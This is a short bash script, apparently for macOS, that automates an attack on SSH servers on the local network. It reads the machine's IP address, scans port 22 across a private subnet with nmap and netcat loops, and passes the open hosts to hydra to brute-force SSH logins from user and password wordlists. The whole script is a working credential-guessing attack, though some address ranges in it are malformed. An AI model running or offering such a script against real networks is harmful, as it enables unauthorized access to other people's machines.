#!/usr/bin/env bash

      export TERM=xterm-color
      ip=$(ipconfig getifaddr en0)
  
if [[ $ip = 192.* ]]; then
echo $(nmap -oN /User/X22/nmapResults.txt 192.168.1.1-20 -p 22)

elif [[ $ip = 10.* ]]; then
echo $(nmap -oN /User/X22/nmapResults.txt 10.0.0.1-20 -p 22)

elif [[ $ip = 172.* ]];
 then
echo $(nmap -oN /User/X22/nmapResults.txt 172.0.0.0-256 -p 22)

else 

echo Your Connected To Celluar
fi

 nc192=$(for i in {1..50}; 
do nc -n -z -v -w 1 192.168.1.$i 22; 
done 2>&1 | grep open | cut -b 1,2,3,4,5,6,7,8,9,10,11,12)

 nc10=$(for i in {1..256}; 
do nc -n -z -v -w 1 10.0.0.$i 22; 
done 2>&1 | grep open | cut -b 1,2,3,4,5,6,7,8,9,10,11,12)

 nc172=$(for i in {1..256}; 
do nc -n -z -v -w 1 172.0.$i.$i 22; 
done 2>&1 | grep open | cut -b 1,2,3,4,5,6,7,8,9,10,11,12)

if [[ $ip = 192.* ]]; then
echo $(hydra -L /User/X22/Users -t 4 -P /User/X22/Passwords -t 4 $nc192 ssh -I) 

elif [[ $ip = 10.* ]]; then 
echo $(hydra -L /User/X22/Users -t 4 -P /User/X22/Passwords -t 4 $nc10 ssh -I) 

elif [[ $ip = 172.* ]]; then 
echo $(hydra -L /User/X22/Users -t 4 -P /User/X22/Passwords -t 4 $nc172 ssh -I) 

fi

ret=$?; times; exit "$ret"


